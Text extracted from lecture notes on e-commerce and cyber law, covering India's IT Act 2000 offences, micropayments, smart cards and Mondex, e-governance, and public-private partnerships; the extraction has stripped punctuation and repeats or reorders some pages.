offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
